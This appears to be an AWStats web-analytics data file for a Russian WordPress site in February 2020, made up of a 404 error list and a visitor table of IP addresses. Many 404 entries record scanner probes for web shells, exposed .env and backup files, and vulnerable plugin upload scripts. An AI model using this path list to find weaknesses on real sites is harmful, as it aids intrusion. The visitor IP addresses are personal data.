/23-%D0%B4%D0%B5%D0%BA%D0%B0%D0%B1%D1%80%D1%8F-2017-%D0%B3-%D1%88%D0%BE%D1%83-%D0%BD%D0%B0-%D0%B2%D0%BE%D0%B4%D0%B5-%D0%BC%D0%B8%D1%81%D1%81%D0%B8%D1%8F-%D0%BE%D0%B4%D0%B8%D1%81%D1%81%D0%B5%D0%B9/ 1 http://go.mail.ru/search_images
/wp-content/plugins/jssor-slider/assets/css/jssor-slider.css 1 -
/wpdemos.php 4 -
/dev/ 2 -
/wp-content/plugins/html404/index.html 3 -
/%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B5-%D0%BF%D1%80%D0%B5%D0%B4%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%B4%D0%BB%D1%8F-%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD/ 1 -
/wp-content/themes/striking_r/framework/plugins/showbiz/js/showbiz_admin.js 1 -
/installer-backup.php 3 -
/home/ 2 -
/jm-ajax/upload_file/ 2 -
/wp-content/plugins/duplicator-pro/assets/css/style.css 1 -
/%D0%B7%D0%B0%D0%BA%D1%80%D1%8B%D1%82%D0%BE%D0%B5-%D0%BF%D1%80%D0%B5%D0%B4%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE%D1%82-fox-fitness/ 1 http://go.mail.ru/search_images
/wp-content/themes/andre/framework/plugins/showbiz/js/showbiz_admin.js 1 -
/layouts/joomla/toolbar/help.php 1 -
/wp-content/plugins/accessally/resource/backend/css/accessally-manage.css 4 -
/sitemap.xml 3 -
/layouts/libraries/cms/html/bootstrap/starttabsetscript.php 1 -
/wp-content/uploads/file-manager/log.txt 2 -
/wp-content/plugins/apikey/apikey.php 3 -
/cli/deletefiles.php 1 -
/wso.php 4 -
/wp-content/_input_3_vuln.htm 2 -
/wp-content/plugins/wpshopify/dist/public.min.css 1 -
/wp-content/plugins/barclaycart/uploadify/settings_auto.php 2 -
/info/license.txt 1 -
/wp-content/plugins/simple-fields/js/chosen/chosen.css 1 -
/wp-sbb.php 1 -
/blog/license.txt 1 -
/wp-content/plugins/revslider/js/rev_admin.js 1 -
/new/ 2 -
/wp-content/uploads/2020/02/settings_auto.php 2 -
/dup-installer/main.installer.php 1 -
/shell.php 4 -
/wp-content/themes/centum/revslider/js/rev_admin.js 2 -
/%D0%BF%D1%80%D0%B0%D0%B7%D0%B4%D0%BD%D0%B8%D1%87%D0%BD%D1%8B%D0%B9-%D0%BA%D0%BE%D0%BD%D1%86%D0%B5%D1%80%D1%82/ 1 http://go.mail.ru/search_images
/old/ 2 -
/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/build.xml 2 -
/wp-content/plugins/widget-logic/mini.php 2 -
/component/users 2 -
/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/showbiz/js/showbiz_admin.js 1 -
/%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B8%D0%BA%D0%B8-%D0%BC%D0%BD%D0%B8%D0%BE%D0%B8-%D0%B8%D0%BC-%D0%BF-%D0%B0-%D0%B3%D0%B5%D1%80%D1%86%D0%B5%D0%BD%D0%B0-%D0%BF%D1%80%D0%B8%D0%B3%D0%BB%D0%B0/ 1 http://go.mail.ru/search_images
/main/ 2 -
/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js 1 -
/wp-content/uploads/2017/10/%D0%A6%D0%B8%D1%80%D0%BA-%D0%9D%D0%B8%D0%BA%D1%83%D0%BB%D0%B8%D0%BD%D0%B0.jpg 1 http://go.mail.ru/search_images
/wp-content/plugins/three-column-screen-layout/db.php 1 -
/%D1%86%D0%B8%D1%80%D0%BA-%D0%BD%D0%B0-%D0%B2%D0%B5%D1%80%D0%BD%D0%B0%D0%B4%D1%81%D0%BA%D0%BE%D0%B3%D0%BE/ 1 http://go.mail.ru/search_images
/stats.php 1 -
/wp-content/plugins/fb-messenger-live-chat/assets/js/main.js 1 -
/wp-content/plugins/cherry-plugin/admin/import-export/settings_auto.php 2 -
/wp-content/plugins/formcraft/file-upload/server/php/files/199877.php 5 -
/includes/framework.php 1 -
/wp-content/plugins/duplicator/readme.txt 3 -
/wp-content/plugins/barclaycart/uploadify/uploadify.php 2 -
/%D0%BF%D0%BB%D0%B0%D0%BD-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%8B-%D0%BF%D1%80%D0%BE%D1%84%D1%81%D0%BE%D1%8E%D0%B7%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BA%D0%BE%D0%BC%D0%B8%D1%82%D0%B5%D1%82%D0%B0-%D0%BC%D1%80/ 2 -
/vendor/phpunit/phpunit/src/Util/PHP/kill.php 1 -
/wp-content/plugins/akismet/akismet.php 1 -
/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/build.xml 2 -
/indoxploit.php 3 -
/wp-content/plugins/easy2map/scripts/jquery.xml2json.js 1 -
/t.php 1 -
/pas.php 1 -
/vendor/phpunit/phpunit/build.xml 2 -
/50-%D1%81%D1%82%D0%BE%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D0%B8-%D0%B7%D0%B0-%D0%BF%D0%BE%D1%81%D0%B5%D1%89%D0%B5%D0%BD%D0%B8%D0%B5-%D0%B2%D0%B5%D1%87%D0%B5%D1%80%D0%BE%D0%B2-%D0%B4%D0%BE%D0%BC%D0%B0-%D1%83/ 1 http://go.mail.ru/search_images
/wp-admin/vuln.htm 2 -
/wp-upload-class.php 1 http://www.facebook.net/
/wp-content/plugins/wp-time-capsule/css/opentip.css 1 -
/wp-content/plugins/fv-wordpress-flowplayer/css/flowplayer.css 1 -
/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/build.xml 2 -
/%D0%BF%D1%80%D0%B8%D0%B3%D0%BB%D0%B0%D1%88%D0%B0%D0%B5%D0%BC-%D0%BD%D0%B0-%D0%BF%D1%80%D0%B0%D0%B7%D0%B4%D0%BD%D0%B8%D0%BA-%D0%BF%D0%B5%D1%80%D0%B2%D0%BE%D0%BA%D0%BB%D0%B0%D1%81%D1%81%D0%BD%D0%B8/ 1 http://go.mail.ru/search_images
/%D0%BD%D0%BE%D0%B2%D0%BE%D0%B3%D0%BE%D0%B4%D0%BD%D0%B5%D0%B5-%D1%88%D0%BE%D1%83-%D1%81%D0%BD%D0%B5%D0%B6%D0%BD%D0%B0%D1%8F-%D0%BA%D0%BE%D1%80%D0%BE%D0%BB%D0%B5%D0%B2%D0%B0/ 1 http://go.mail.ru/search_images
/wp-content/plugins/wp-db-ajax-made/wp-ajax.php 1 -
/jss.php 1 -
/replace.php 7 -
/wp-content/plugins/insert-php/admin/assets/js/tag-it.js 1 -
/V5.php 2 -
/wp-content/themes/beach_apollo/advance/plugins/revslider/js/rev_admin.js 1 -
/wp2/wp-login.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai//wp2/wp-login.php
/wp-content/plugins/prh-api/vendor/phpunit/phpunit/build.xml 2 -
/wp-content/themes/designplus/framework/plugins/showbiz/js/showbiz_admin.js 1 -
/wp/license.txt 1 -
/wp-content/plugins/hd-webplayer/playlist.php 2 -
/wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/build.xml 2 -
/wp-content/themes/designplus/framework/plugins/revslider/js/rev_admin.js 1 -
/wp-content/themes/IncredibleWP/framework/plugins/showbiz/js/showbiz_admin.js 1 -
/installer-data.sql 1 -
/wp-content/plugins/simple-ads-manager/db.php 1 -
/wp-content/plugins/easy-wp-smtp/js/script.js 1 -
/wp-content/themes/Avada/framework/plugins/showbiz/js/showbiz_admin.js 1 -
/test/wp-login.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai//test/wp-login.php
/wp-content/plugins/xichang/x.php 2 -
/author-sitemap.xml 1 -
/wp-content/plugins/yellow-pencil-visual-theme-customizer/js/yellow-pencil.js 1 -
/wp-content/themes/medicate/script/showbiz/js/showbiz_admin.js 1 -
/wp-content/uploads/2018/09/wp-load-5b7a23c0744615b7a23c0744af.php 1 -
/wp-content/plugins/contabileads/integracoes/mautic/api-library/vendor/phpunit/phpunit/build.xml 2 -
/wp-content/plugins/wp-live-chat-software-for-wordpress/plugin_files/js/livechat.js 1 -
/wp-content/plugins/wordpress-database-reset/assets/css/bsmselect.css 4 -
/wp-content/plugins/gourl-bitcoin-payment-gateway-paid-downloads-membership/images/coins/bitcoin.png 2 -
/wp-content/plugins/viral-optins/api/uploader/file-uploader.php 2 -
/layouts/libraries/cms/html/bootstrap/addtab.php 1 -
/blog/ 2 -
/site/ 2 -
/.env 6 -
/wp-content/plugins/image-clipboard/readme.txt 1 -
/wp-content/plugins/blnmrpb/log.txt 4 -
/wp-content/themes/IncredibleWP/framework/plugins/revslider/js/rev_admin.js 1 -
/wp-content/themes/centum/showbiz/js/showbiz_admin.js 1 -
/wp/ 2 -
/wp-content/plugins/profile-builder/assets/css/serial-notice.css 1 -
/wp-content/plugins/responsive-coming-soon/templates/template1/assets/css/style.css 1 -
/wp-content/plugins/rich-reviews/css/rich-reviews.css 1 -
/wp-content/plugins/ithemes-sync/js/settings-page.js 1 -
/wp-content/plugins/duplicator-pro/readme.txt 1 -
/wp-admin/vuln.php 2 -
/wp-content/themes/pindol/showbiz/js/showbiz_admin.js 1 -
/wp-content/themes/cuckootap/framework/plugins/revslider/js/rev_admin.js 1 -
/2020/wp-login.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai//2020/wp-login.php
/wp/wp-login.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai//wp/wp-login.php
/cloudxv3.php 1 -
/wp-content/plugins/gourl-bitcoin-payment-gateway-paid-downloads-membership/images/coins/paid.png 2 -
/25-%D0%BD%D0%BE%D1%8F%D0%B1%D1%80%D1%8F-2017-%D0%B3-%D1%8D%D0%BA%D1%81%D0%BA%D1%83%D1%80%D1%81%D0%B8%D1%8F-%D0%B2-%D0%BA%D0%B0%D0%BB%D1%83%D0%B6%D1%81%D0%BA%D0%B8%D0%B9-%D0%BC%D1%83%D0%B7%D0%B5%D0%B9/ 1 http://go.mail.ru/search_images
/sample-page/wp-login.php 9 -
/demo/ 2 -
/server/php/ 2 http://xn--g1akdbaehef3a2a5g.xn--p1ai/server/php/
/wp-content/plugins/apikey/cursed.php 1 -
/wp-json/visualizer/v1/update-chart 4 -
/old/wp-login.php 1 http://xn--g1akdbaehef3a2a5g.xn--p1ai//old/wp-login.php
/%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B5-%D0%BF%D1%80%D0%B5%D0%B4%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE%D1%82-%D1%84%D0%B8%D1%82%D0%BD%D0%B5%D1%81-%D0%BA%D0%BB/ 2 -
/wp-content/plugins/formcraft/file-upload/server/content/upload.php 4 -
/wp-content/plugins/theme-configurator/mini.php 2 -
/backup/ 2 -
/graphql 2 -
/wp-content/plugins/smart-google-code-inserter/screenshot1.jpg 1 -
/wp-content/plugins/wpematico/app/js/wpe_hooks.js 1 -
/wp-content/plugins/three-column-screen-layout/firewall.php 1 -
/wp-content/plugins/zxc/dasha.php 1 -
/_config.cache.php 1 http://www.facebook.net/
/plugins/system/debug/debug.xml 1 -
/installer.php 3 -
/portal/ 2 -
/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/build.xml 2 -
/cms/ 2 -
/wp-content/themes/cuckootap/framework/plugins/showbiz/js/showbiz_admin.js 1 -
/wp-json/wp/v2/posts/1467,%22href%22:%22http:%5C/%5C/%5Cu043f%5Cu0440%5Cu043e%5Cu0444%5Cu0441%5Cu043e%5Cu044e%5Cu0437%5Cu043c%5Cu0440%5Cu043d%5Cu0446.%5Cu0440%5Cu0444%5C/wp-json%5C/wp%5C/v2%5C/posts%5C/1466%5C/revisions%5C/1467%22%7D%5D,%22wp:attachment%22 1 -
/wp-content/plugins/batchmove/js/batch.js 4 -
/wp-json/wp/v2/posts/1451,%22href%22:%22http:%5C/%5C/%5Cu043f%5Cu0440%5Cu043e%5Cu0444%5Cu0441%5Cu043e%5Cu044e%5Cu0437%5Cu043c%5Cu0440%5Cu043d%5Cu0446.%5Cu0440%5Cu0444%5C/wp-json%5C/wp%5C/v2%5C/posts%5C/1447%5C/revisions%5C/1451%22%7D%5D,%22wp:attachment%22 1 -
/wp-content/plugins/formcraft/file-upload/server/php/upload.php 1 -
/%D0%BC%D0%B0%D1%80%D1%82-%D1%8E%D0%B1%D0%B8%D0%BB%D1%8F%D1%80%D1%8B/ 2 -
/language/en-GB/en-GB.localise.php 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 536
80.245.252.228 294 1026 36824733 20200228153724
81.209.248.203 73 73 540664 20200210101414
80.245.248.234 60 289 20961369 20200226104744
185.85.239.110 18 18 2826 20200229112902
158.69.158.101 17 17 487410 20200221131259
185.86.164.98 13 13 2041 20200229070532
185.86.164.103 13 13 2041 20200227184901
102.37.8.117 12 12 407314 20200228041559
178.137.82.147 12 12 396871 20200216221712
185.86.164.107 12 12 1884 20200228131805
40.77.189.162 1 19 283613 20200211182907
92.46.46.254 0 1 524551 
66.249.93.234 0 1 130628 
51.79.30.167 2 2 43426 20200211092314
85.203.44.199 1 1 157 20200227024730
185.216.194.172 1 20 226450 20200210120217
5.34.22.78 2 23 382689 20200223130411
185.238.197.253 0 1 125389 
123.148.243.70 2 2 45208 20200222015620
5.188.210.52 2 2 70804 20200206170801
207.180.234.123 1 1 172965 20200211023825
77.88.10.80 0 1 0 
213.87.131.137 4 23 360647 20200205112239
145.255.21.20 1 20 241742 20200202092125
94.180.129.86 1 20 229811 20200218163913
92.53.66.50 1 1 43269 20200203072630
51.158.111.229 1 1 34179 20200204001338
18.237.237.77 1 1 42863 20200219040434
162.251.61.154 1 1 43167 20200229045703
34.219.109.82 1 1 43269 20200206034345
14.234.141.54 2 2 44031 20200223071440
93.158.158.74 0 3 42496 
176.59.40.176 2 23 326902 20200219141038
163.172.116.48 0 1 8925 
44.233.116.51 1 1 43269 20200209040719
40.77.191.4 0 2 15597 
78.36.203.153 0 1 130628 
94.25.4.98 2 22 306392 20200210133550
54.245.170.84 1 1 43167 20200228042430
37.147.234.199 0 1 98301 
185.114.137.218 0 1 130628 
178.140.8.74 0 1 462777 
185.86.164.106 7 7 1099 20200225120950
188.165.240.75 4 4 132229 20200228201013
54.189.7.190 1 1 42863 20200228042413
145.255.253.73 3 23 357140 20200205124520
157.245.170.18 3 3 88375 20200218051414
78.46.103.42 1 1 43167 20200229042028
178.123.127.152 0 1 587758 
89.113.138.117 0 1 130628 
176.212.115.114 0 6 1975587 
178.214.255.74 1 21 317499 20200219171219
185.176.221.195 2 24 424054 20200208121938
81.95.135.194 1 1 43167 20200220104133
85.93.34.161 2 22 306351 20200225143132
86.57.244.51 0 1 130628 
199.244.88.131 2 2 86538 20200208153322
185.6.127.227 0 1 47495 
54.186.120.25 1 1 42863 20200223042622
94.140.139.87 2 23 476611 20200226211151
178.166.184.250 0 1 145075 
123.148.240.225 2 2 45249 20200206155417
195.5.134.210 0 1 130628 
104.211.36.122 1 1 43269 20200202041219
95.24.24.140 2 20 328640 20200201155857
195.93.129.114 1 14 165049 20200203113155
40.77.189.175 0 1 39680 
94.242.153.104 2 24 549288 20200215224610
132.148.158.70 1 1 43167 20200214023119
46.119.119.33 1 1 43167 20200217200512
81.30.186.6 2 23 361224 20200213221853
183.150.217.114 2 2 45208 20200218191646
188.163.104.142 2 2 43324 20200218090304
62.148.157.39 7 40 2089116 20200228200725
185.86.93.53 1 1 43269 20200205041834
5.188.84.95 1 1 43167 20200227193309
66.102.9.109 4 72 3799092 20200228203859
213.242.15.35 1 1 43269 20200208003350
185.85.238.244 3 3 471 20200224085617
144.76.174.7 2 2 45249 20200205114330
217.107.127.89 0 1 47495 
217.79.12.98 0 1 1283613 
85.233.69.164 0 1 524551 
109.252.58.65 11 73 12296466 20200211101633
185.135.150.41 3 23 344684 20200203190911
91.122.30.68 1 1 43167 20200215032241
134.249.141.83 4 4 132413 20200203090132
159.65.196.149 1 1 157 20200216220734
128.75.89.57 0 1 130628 
123.148.244.28 2 2 45208 20200227071719
149.202.45.11 1 1 152 20200227033940
213.87.132.250 0 1 587758 
201.141.200.98 1 8 93951 20200211021923
5.3.148.28 0 1 127696 
90.188.47.246 0 1 130628 
93.124.39.2 2 2 86538 20200203203249
54.201.191.10 1 1 43269 20200208040652
91.193.178.39 2 48 2629908 20200201193711
213.87.137.175 3 34 1083646 20200223004617
217.107.199.234 2 23 472950 20200217182000
176.195.15.6 1 20 227550 20200207075551
105.213.16.2 1 1 34138 20200222223028
95.152.2.83 1 1 43269 20200205095220
109.234.15.98 3 34 1406960 20200204153802
188.166.50.186 2 2 43324 20200221093110
185.86.164.101 11 11 1727 20200220002431
123.148.246.140 2 2 45208 20200213102938
62.176.13.157 2 23 360596 20200229113738
185.86.164.99 9 9 1413 20200228230555
77.111.247.50 4 35 1762827 20200212190646
87.245.175.42 0 1 543615 
176.109.111.90 2 32 1246615 20200217102034
94.79.57.130 0 2 224101 
176.59.103.113 2 23 360909 20200220094521
104.236.133.77 1 1 43269 20200202203631
101.4.60.63 1 21 106867 20200222051426
212.67.214.27 1 1 43167 20200213125112
144.91.95.177 1 1 43167 20200215184435
54.190.13.254 1 1 43167 20200229063258
5.196.207.195 1 1 43167 20200213175903
123.148.219.128 2 2 45249 20200202134117
188.93.56.216 1 1 43167 20200220035237
62.148.157.25 2 22 318944 20200216173440
91.107.56.210 0 1 587758 
40.77.188.0 0 4 194774 
185.108.199.12 2 22 309386 20200205062627
94.29.97.69 1 1 34408 20200202195151
80.83.235.118 0 1 524551 
139.99.8.3 1 1 43269 20200203020242
47.52.114.248 1 1 33866 20200209153508
54.200.214.33 1 1 42863 20200226034351
185.135.150.186 7 68 14025898 20200220155812
188.240.208.26 1 1 157 20200218190912
40.77.189.91 0 1 1399 
46.45.185.173 1 1 43269 20200206151422
178.136.123.116 1 1 43167 20200213191403
92.63.197.160 1 1 0 20200219064939
195.242.80.62 1 1 42638 20200210084750
192.99.58.112 1 1 157 20200207153103
213.172.24.26 2 22 318985 20200210165820
85.204.246.240 1 1 157 20200215000352
82.138.49.240 0 1 587758 
128.74.246.191 1 20 229757 20200201183524
42.236.10.78 3 10 604206 20200228060844
40.77.188.243 0 1 11069 
87.228.16.169 1 20 225859 20200209133354
85.174.193.104 2 22 312307 20200206211212
80.86.28.17 1 1 43269 20200208231512
165.22.40.71 2 2 45880 20200208171511
178.69.62.169 0 1 133345 
93.158.156.96 0 1 524551 
109.252.61.71 0 2 543488 
91.227.254.236 0 1 272601 
51.161.105.105 1 1 43269 20200207121903
217.74.161.243 0 1 45568 
188.233.8.89 3 24 364121 20200224145943
91.194.227.234 0 1 47495 
185.193.197.237 2 22 306351 20200226094543
142.93.145.204 1 1 0 20200217212409
185.175.119.121 0 1 155425 
5.105.0.135 1 1 43167 20200222223455
188.170.80.39 2 23 395323 20200205161249
85.140.2.184 0 1 345493 
185.86.164.111 10 10 1570 20200227042855
213.87.129.43 0 1 130628 
125.105.103.180 2 2 45208 20200221190013
185.85.239.195 7 7 1099 20200225014826
85.15.96.111 0 1 130628 
83.239.144.62 0 1 130628 
213.87.153.137 4 36 1268491 20200214122949
40.77.188.230 1 1 165548 20200206083955
138.197.148.140 1 1 0 20200217212409
40.77.188.82 0 1 11069 
188.32.145.152 0 1 133345 
40.77.189.59 0 1 1399 
91.205.130.14 2 22 321330 20200221173018
95.24.24.3 1 21 400143 20200218151951
185.86.167.4 8 8 1256 20200223180744
68.183.104.51 2 2 86538 20200205003018
173.212.215.179 0 1 0 
163.172.147.94 1 1 34138 20200213112437
95.29.72.40 2 21 316516 20200207003236
87.251.76.139 1 1 43167 20200227051647
213.6.93.66 1 1 34138 20200223162435
131.161.68.45 1 1 34179 20200202131000
95.32.135.106 0 1 126782 
212.164.64.118 2 22 306351 20200212083215
123.200.20.242 1 1 34179 20200208212942
120.55.240.188 0 1 19935 
195.34.246.204 10 10 0 20200229153524
185.86.13.213 11 11 1727 20200229150346
185.135.151.152 2 24 514290 20200203150256
81.5.102.120 2 2 43324 20200212174654
93.158.158.73 0 1 0 
128.199.43.109 1 1 43167 20200213062233
212.92.121.97 1 1 43167 20200218121746
89.169.69.222 2 23 360243 20200217174949
109.197.204.197 6 37 1203557 20200221131514
94.242.186.176 3 34 1483018 20200224192012
93.80.250.248 1 20 224129 20200224223543
109.252.24.33 3 33 432363 20200220173049
125.106.94.7 2 2 45249 20200204083249
185.86.164.104 6 6 942 20200229182126
176.59.212.235 0 1 130628 
51.77.246.199 1 28 659303 20200210041645
212.14.161.78 2 22 306392 20200206133027
212.35.179.215 0 1 587758 
95.108.133.212 2 22 306351 20200217090935
123.148.210.215 2 2 45249 20200210232521
66.249.81.173 0 1 130628 
178.32.213.61 4 4 132229 20200228220043
94.245.132.174 0 1 153701 
88.252.24.109 1 19 161334 20200208005708
185.119.81.50 8 8 1256 20200227122006
40.77.189.121 0 1 14440 
51.68.152.26 11 11 475449 20200228195522
81.26.149.66 0 1 297627 
185.85.190.132 10 10 1570 20200228085836
66.102.9.107 6 50 2448958 20200228203859
213.108.204.194 0 1 154204 
34.223.255.200 1 1 43167 20200215035302
194.176.118.97 10 10 418710 20200221212930
46.39.54.214 0 1 98301 
40.77.189.47 0 1 31000 
46.242.15.181 2 22 318944 20200219200616
104.148.41.11 1 1 157 20200221022206
37.150.203.192 0 1 587758 
89.35.39.60 2 2 314 20200222193659
2.94.210.144 0 1 130628 
46.48.10.205 2 20 327076 20200210132450
158.69.26.144 3 3 129807 20200206005918
46.48.133.254 2 23 890931 20200221055447
167.99.73.144 1 1 157 20200218212720
100.20.122.74 1 1 42863 20200215035259
94.180.136.109 1 23 758421 20200212221353
185.86.164.102 10 10 1570 20200227100423
40.77.190.9 0 2 110739 
40.77.189.232 0 1 12960 
82.208.112.252 0 1 130628 
83.149.47.227 2 24 549329 20200205185223
40.77.188.8 0 2 455521 
80.83.234.108 0 1 130628 
40.77.190.107 2 38 567226 20200224105901
40.77.189.10 0 1 121457 
42.236.10.93 1 23 554185 20200228060843
40.77.188.16 1 1 165548 20200216204326
83.220.237.195 3 27 383047 20200215194149
178.217.28.152 2 48 2629908 20200207021855
128.69.198.183 1 31 1150529 20200206071126
176.14.207.127 1 31 1739698 20200206210723
42.236.10.117 0 6 53525 
176.15.40.146 1 20 227795 20200209020605
52.40.138.118 1 1 42964 20200201042246
93.158.158.75 0 1 0 
42.236.10.84 1 12 1065352 20200228060848
95.24.6.72 0 1 68351 
139.255.34.51 1 1 34179 20200203153219
223.199.20.30 1 1 34179 20200209153819
40.77.188.112 0 1 12960 
176.215.69.187 0 1 133345 
195.154.93.245 3 3 88518 20200207055008
31.163.227.227 2 23 325911 20200204164750
91.221.65.9 0 1 168046 
188.162.142.120 1 1 43167 20200224160537
85.173.209.158 1 12 112057 20200207150228
42.236.10.125 1 6 175475 20200228060847
81.222.69.48 0 1 524551 
123.148.241.63 2 2 45208 20200213132630
195.246.118.195 2 22 306351 20200213064407
185.193.199.108 0 1 587758 
40.77.189.214 0 2 11829 
178.76.223.250 0 1 524551 
213.59.130.15 1 1 0 20200206200944
94.242.171.46 3 34 1257467 20200211174730
40.77.190.177 0 2 55907 
109.236.249.82 0 1 133345 
213.177.107.11 0 1 45568 
194.190.84.254 0 1 1283613 
134.213.60.8 1 1 157 20200206173455
31.202.46.64 11 11 409410 20200212180242
95.25.4.52 0 1 130628 
195.88.52.5 0 1 42496 
40.77.188.146 0 1 2385 
198.16.74.45 0 1 587758 
95.27.7.66 0 1 125800 
54.244.81.182 1 1 42863 20200214034407
18.237.73.199 1 1 43167 20200220034539
45.76.191.137 1 1 157 20200221204640
104.238.110.15 1 1 157 20200202191121
199.201.106.37 8 8 177952 20200221090017
220.227.71.226 1 1 34179 20200204125713
95.107.122.203 3 34 1521848 20200221225450
123.148.218.61 2 2 45249 20200211015344
70.31.3.202 1 1 43167 20200220104851
188.170.75.159 2 21 316516 20200207101108
89.35.39.180 6 6 942 20200219232404
93.91.14.173 0 1 133345 
46.187.2.190 0 1 47495 
185.94.213.148 2 22 283826 20200205125337
185.204.0.172 1 1 43167 20200229001207
52.32.1.222 1 1 42964 20200210041751
90.188.255.142 1 1 43167 20200217093240
176.103.215.29 3 24 381825 20200210153505
78.46.195.66 3 3 88375 20200217224714
82.99.242.20 1 1 34179 20200211132204
78.47.48.49 1 1 43269 20200206090346
123.148.247.218 2 2 45208 20200221231928
93.172.236.79 11 177 37712281 20200215143201
46.242.9.196 2 55 3180224 20200225115726
93.113.111.100 1 1 159 20200222164637
191.101.125.119 1 1 43269 20200207180121
46.42.177.159 1 46 2550238 20200223122404
185.86.164.109 5 5 785 20200226122047
40.77.190.10 1 6 235507 20200219043948
128.72.18.89 1 30 1439158 20200212014004
94.242.171.17 0 1 587758 
178.89.53.99 2 22 312266 20200211200006
40.77.188.199 0 1 11142 
158.69.158.103 3 3 88518 20200201062951
172.104.103.221 1 1 43269 20200203125006
34.221.59.173 1 1 43269 20200203125059
95.30.28.119 1 1 43167 20200224105214
91.243.230.147 2 22 306351 20200223160903
84.237.20.138 1 9 267187 20200203113155
40.77.189.12 0 2 108015 
5.143.186.237 6 66 15046766 20200210213026
149.202.75.164 2 2 43167 20200218065909
109.248.47.132 0 1 524551 
80.95.45.238 2 2 86436 20200226013244
125.105.82.44 2 2 45249 20200210183450
109.252.125.158 0 1 130628 
62.33.236.66 0 1 587758 
123.148.208.50 2 2 45249 20200202002128
217.66.154.113 2 22 290486 20200218124607
167.172.21.234 1 1 157 20200225163136
125.105.81.63 2 2 45208 20200214192724
91.78.110.246 0 1 462777 
89.163.242.241 1 1 43167 20200215173427
46.101.185.245 2 2 86334 20200221090447
5.255.174.141 2 2 43324 20200229021518
109.197.204.178 2 33 1699899 20200211151307
95.165.94.59 3 23 375186 20200212153023
188.237.180.175 2 23 382689 20200223185256
213.108.141.190 2 22 380286 20200208114141
81.17.153.130 2 22 306392 20200206103859
185.141.213.166 1 1 157 20200224210630
46.146.40.22 0 1 130628 
91.189.237.198 0 1 130628 
40.77.188.189 0 1 63453 
186.216.174.119 1 1 34179 20200210141450
78.106.94.85 3 40 555049 20200214145326
185.200.60.19 0 1 52937 
138.68.75.162 2 2 43324 20200228105753
184.94.240.92 1 1 43269 20200204034131
35.166.22.240 1 1 42863 20200212040643
80.90.82.70 1 1 157 20200216172050
187.188.183.119 2 2 44133 20200201103951
78.24.222.76 2 2 89666 20200208132805
40.77.189.30 0 6 222149 
165.227.217.101 1 1 43167 20200219103514
40.77.190.1 0 1 1645 
176.59.40.115 2 23 397668 20200212153056
40.77.188.252 0 4 176165 
54.184.249.187 1 1 43167 20200212040657
85.91.199.222 0 1 136374 
34.220.207.11 1 1 42964 20200208040639
185.85.191.201 9 9 1413 20200217000202
40.77.188.237 0 2 41453 
90.188.249.184 0 1 136374 
66.249.81.238 0 1 130628 
51.15.124.39 1 1 43167 20200227105357
62.176.12.47 0 1 133345 
213.87.156.217 0 1 587758 
188.166.181.139 1 1 157 20200205094640
66.102.9.111 7 72 4583010 20200228203925
31.163.205.186 4 25 443149 20200223153520
123.148.218.243 2 2 45249 20200204141340
167.114.172.225 3 3 129807 20200207221307
176.59.205.165 2 31 1241853 20200206081028
178.161.205.122 4 65 15008037 20200203095333
125.24.88.39 1 1 34138 20200221160141
109.225.40.117 2 23 338463 20200226211743
141.98.244.2 9 9 363593 20200207043359
34.202.93.213 2 2 53897 20200204160716
40.77.189.170 0 1 1645 
188.240.223.5 1 1 43167 20200214065223
185.86.164.110 4 4 628 20200224081402
185.85.162.242 1 1 43167 20200219081322
154.16.69.2 2 2 86334 20200220152746
37.193.63.79 0 2 1087230 
95.82.251.127 0 1 160147 
196.52.43.73 1 1 43167 20200220144549
92.255.219.20 2 20 337663 20200218004801
213.87.150.16 0 1 166912 
176.119.109.24 1 1 43167 20200223204901
209.41.186.40 1 1 43167 20200217055039
144.76.70.236 2 21 309838 20200209212641
123.148.244.141 2 2 45208 20200227095842
91.230.72.42 0 1 587758 
134.73.56.17 1 1 157 20200221022446
54.69.88.218 1 1 43167 20200214034403
104.243.212.177 1 1 43269 20200210232657
42.236.10.75 0 7 312111 
188.243.213.11 1 20 223247 20200208090640
84.17.48.21 1 1 43167 20200229070409
213.87.154.6 2 33 1611845 20200227082634
95.217.131.74 8 8 258902 20200225164325
169.0.92.177 1 1 34138 20200214180416
176.59.33.142 0 1 125800 
173.212.233.72 4 4 172668 20200225201652
125.99.200.243 1 1 43269 20200211113645
109.174.115.95 0 1 130628 
2.58.12.43 1 1 43167 20200229032734
176.59.71.184 0 1 587758 
166.62.101.171 1 1 43167 20200214110931
82.198.176.50 0 1 98301 
46.242.61.151 0 1 154204 
213.87.160.194 0 1 524551 
185.86.164.100 9 9 1413 20200229204741
40.77.189.169 1 18 279587 20200214013247
80.83.234.237 0 1 130628 
194.93.56.228 2 2 86334 20200228103713
5.165.20.66 0 1 113475 
166.62.36.222 1 1 157 20200211160234
13.91.201.3 4 4 89420 20200212232614
195.242.80.89 1 1 42597 20200227163018
94.29.126.23 0 2 1175516 
83.149.47.220 2 35 1721719 20200210085424
34.210.85.103 1 1 43269 20200210041756
51.161.105.242 4 4 91760 20200210154420
95.181.129.15 1 1 34138 20200213210654
93.80.7.101 4 45 670666 20200223172235
